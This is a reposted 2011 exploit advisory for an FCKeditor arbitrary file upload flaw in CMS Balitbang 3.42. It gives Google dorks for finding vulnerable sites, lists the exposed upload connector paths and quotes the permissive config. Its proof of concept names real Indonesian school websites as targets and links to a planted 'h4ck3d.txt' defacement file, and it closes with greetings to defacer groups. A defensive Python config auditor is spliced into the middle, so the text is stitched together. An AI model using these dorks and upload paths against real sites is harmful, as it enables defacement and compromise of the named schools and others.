
CMS Balitbang 3.42 Fckeditor Arbitrary File Uploads Exploit

Title Exploited  : CMS Balitbang 3.42 Fckeditor Arbitrary File Uploads Exploit
Author Exploit  : the_cyber_nuxbie
Time & Date    : 2011-04-26
============================================================================================================
| CMS Balitbang 3.42 Fckeditor Arbitrary File Uploads Exploit |

#[~] Author : the_cyber_nuxbie
#[~] Home   : www.thecybernuxbie.com
#[~] E-mail : nuxbie@sekuritionline.net
#[~] Found  : 06 April 2011.
#[~] Version: CMS Balitbang 3.42.
#[~] Tested : Windows 7 Ultimate 32bit.
#[~] Link   : http://www.kajianwebsite.org/download/cms-balitbang.rar
#[!] Dork   : inurl:"/html/siswa.php?"
              inurl:"/html/alumni.php?"
              inurl:"/html/guru.php?"
______________________________________________________________

#[~] Exploited:

http://public_html/dir/editor/filemanager/connectors/uploadtest.html

http://public_html/dir/editor/filemanager/connectors/test.html

http://public_html/dir/editor/filemanager/browser/default/browser.html

#[~] Directory:

http://public_html/userfiles/file/file-deface.txt

Setting:
"editor/filemanager/connectors/php/config.php"

$Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', 'gzip', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'ods', 'odt', 'pdf', 'png', 'ppt', 'pxd', 'qt', 'ram', 'rar', 'rm', 'rmi', 'rmvb', 'rtf', 'sdc', 'sitd', 'swf', 'sxc', 'sxw', 'tar', 'tgz', 'tif', 'tiff', 'txt', 'vsd', 'wav', 'wma', 'wmv', 'xls', 'xml', 'zip') ;
$Config['DeniedExtensions']['File']  = array() ;
$Config['FileTypesPath']['File']  = $Config['UserFilesPath'] . 'file/' ;
$Config['FileTypesAbsolutePath']['File']= ($Config['UserFilesAbsolutePath'] == '') ? '' : $Config['UserFilesAbsolutePath'].'file/' ;
$Config['QuickUploadPath']['File']  = $Config['UserFilesPath'] ;
$Config['QuickUploadAbsolutePath']['File']= $Config['UserFilesAbsolutePath'] ;
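Added defender-side check, not part of the original advisory: it reads the text of an FCKeditor php/config.php and flags the conditions quoted above (an entry such as 'txt' in AllowedExtensions, an empty DeniedExtensions, no explicit $Config['Enabled'] = false), and can also report whether the demo connector pages listed under "Exploited" are still deployed in a webroot. The RISKY_EXT set and the SAMPLE_CONFIG excerpt are constructed assumptions.

```python
import re
from pathlib import Path

# Demo/test pages the advisory lists as reachable; they should not be
# present in a production deployment of the editor.
TEST_PAGES = (
    "editor/filemanager/connectors/uploadtest.html",
    "editor/filemanager/connectors/test.html",
    "editor/filemanager/browser/default/browser.html",
)
# Assumed policy: server-side script and browser-rendered types should not be
# accepted on an upload path. 'txt' is included because the advisory's proof
# of concept uploads a .txt file; adjust to local policy.
RISKY_EXT = {"php", "php3", "php4", "php5", "phtml", "htm", "html", "js", "txt"}

def audit_config(source: str) -> list:
    """Return findings for the source text of an FCKeditor php/config.php."""
    findings = []
    # Upstream ships the connector disabled; treat a missing line as not disabled.
    m = re.search(r"\$Config\['Enabled'\]\s*=\s*(true|false)", source)
    if m is None or m.group(1) == "true":
        findings.append("connector not explicitly disabled ($Config['Enabled'])")
    pat = r"\$Config\['(Allowed|Denied)Extensions'\]\['(\w+)'\]\s*=\s*array\((.*?)\)\s*;"
    for kind, rtype, body in re.findall(pat, source, re.S):
        exts = set(re.findall(r"'([^']+)'", body))
        if kind == "Allowed":
            bad = sorted(exts & RISKY_EXT)
            if bad:
                findings.append(f"{rtype}: allows {', '.join(bad)}")
        elif not exts:
            findings.append(f"{rtype}: DeniedExtensions is empty")
    return findings

def audit_webroot(root) -> list:
    """Return findings for a deployed tree: test pages present plus config issues."""
    root = Path(root)
    findings = [f"test page deployed: {p}" for p in TEST_PAGES if (root / p).exists()]
    cfg = root / "editor/filemanager/connectors/php/config.php"
    if cfg.exists():
        findings += audit_config(cfg.read_text(errors="replace"))
    return findings

# Constructed sample: a shortened form of the resource-type lines quoted above.
SAMPLE_CONFIG = """<?php
$Config['AllowedExtensions']['File'] = array('7z', 'doc', 'gif', 'jpg', 'pdf', 'txt', 'zip') ;
$Config['DeniedExtensions']['File']  = array() ;
"""

if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG):
        print("[!]", f)
```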

- P.o.C:
1. Target: sites on .sch.id (Indonesian school domains).

http://www.sma-magelang.sch.id

http://www.smp-banjar.sch.id

http://www.sma3-pesantren.sch.id

2. http://www.sma-magelang.sch.id/editor/filemanager/connectors/test.html

http://www.sma-magelang.sch.id/editor/filemanager/connectors/uploadtest.html

3. Find Your Files:

http://www.sma-magelang.sch.id/userfiles/file/h4ck3d.txt

- Greetz:
All Member YogyaFamilyCode.
All Member IndonesianDefacer.
All Member IndonesianCoder.
All Member MagelangCyber.
All Member Devilzc0de.
All Member Hacker-Newbie.
All Member Jatim-Crew.
All Member Fast-Hacker

- April 7 2011, GMT +07:00 Solo Raya, Indonesia.
============================================================================================================
Copyright © 2013. INFORMASI INTERNET - All Rights Reserved | Template Created by Kompi Ajaib Proudly powered by Blogger